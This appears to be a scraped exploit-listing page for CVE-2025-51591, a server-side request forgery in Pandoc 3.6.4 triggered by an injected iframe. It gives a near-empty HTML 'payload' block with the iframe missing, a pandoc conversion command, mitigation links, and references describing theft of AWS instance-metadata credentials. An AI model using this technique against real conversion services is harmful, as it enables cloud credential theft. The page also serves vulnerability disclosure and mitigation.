Exploit for CVE-2025-51591

## https://sploitus.com/exploit?id=9F3A9BDC-91E5-5753-AFCD-9F412A964DF0
# CVE-2025-51591 Pandoc SSRF POC



A Server-Side Request Forgery (SSRF) in JGM Pandoc v3.6.4 allows attackers to gain access to and compromise the whole infrastructure via injecting a crafted iframe.

# Install Pandoc
- https://pandoc.org/installing.html

# Payload
```html




    
    
    CVE-2025-51591 Proof Of Concept



    
        CVE-2025-51591 Proof Of Concept
    
    



```
# Convert Payload To PDF Using Pandoc
```
pandoc payload.html -o output1.pdf
```





# Mitigate Strategies
- https://github.com/jgm/pandoc/issues/10682#issuecomment-2718343529
- https://pandoc.org/MANUAL.html#a-note-on-security

# References
- [Hackers Exploit Pandoc CVE-2025-51591 to Target AWS IMDS and Steal EC2 IAM Credentials](https://thehackernews.com/2025/09/hackers-exploit-pandoc-cve-2025-51591.html)
- [IMDS Abused: Hunting Rare Behaviors to Uncover Exploits](https://www.wiz.io/blog/imds-anomaly-hunting-zero-day)
- [SSRF When Generating PDFs from User-Controlled HTML](https://github.com/jgm/pandoc/issues/10682)